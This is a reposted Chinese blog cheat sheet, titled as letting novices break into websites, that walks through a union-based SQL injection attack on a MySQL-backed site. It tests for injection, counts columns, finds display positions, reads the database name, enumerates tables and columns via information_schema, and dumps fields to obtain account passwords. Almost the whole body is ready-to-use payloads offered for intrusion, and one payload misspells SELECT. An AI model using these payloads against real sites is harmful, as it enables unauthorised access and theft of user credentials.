震惊!sql注入 的格式居然被他爆了出来,按照这个格式,新手入侵网站变成可能?!(作者自用格式)

转载自:https://blog.csdn.net/qq_42777804/article/details/81226567

  1. 判断是否存在注入

id=1’ 异常

id=1’ and 1=1%23 正确

id=1’ and 1=2%23 错误

说明存在单引号字符型SQL注入

都错误的话,可以尝试数字型,双引号,括号型

2.求列数

id = 1 order by 4%23 正常

Id = 1 order by 5%23异常

说明有4列 

格式 id = 1 order by 数字%23

3.求显示位

id = 1 and 1=2 union selcet 1,2,3,4%23      有几列就到几

之后去找看看那里替换了1,2,3,4中的哪一个

4.求数据库

找出替换了的那一位  之后用database() 替换掉数字位 便可得出数据库

假如2变了 就可以用2替换

Id=1 and 1=2 union select 1,database(),3,4%23

会根据这个爆出数据库。

5.求表名

id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='数据库名'%23

求出的各个表的名字

(table_name)改为(0x23,table_name) 可以用#将表名分开

6.求列名

id=1 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='数据库名' and table_name = '表名’%23

7.求字段内容

id=2 union select 1,2,group_concat(需列,0x23,需列),4 from 数据库名.表名%23

即爆出需要的账户密码了

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值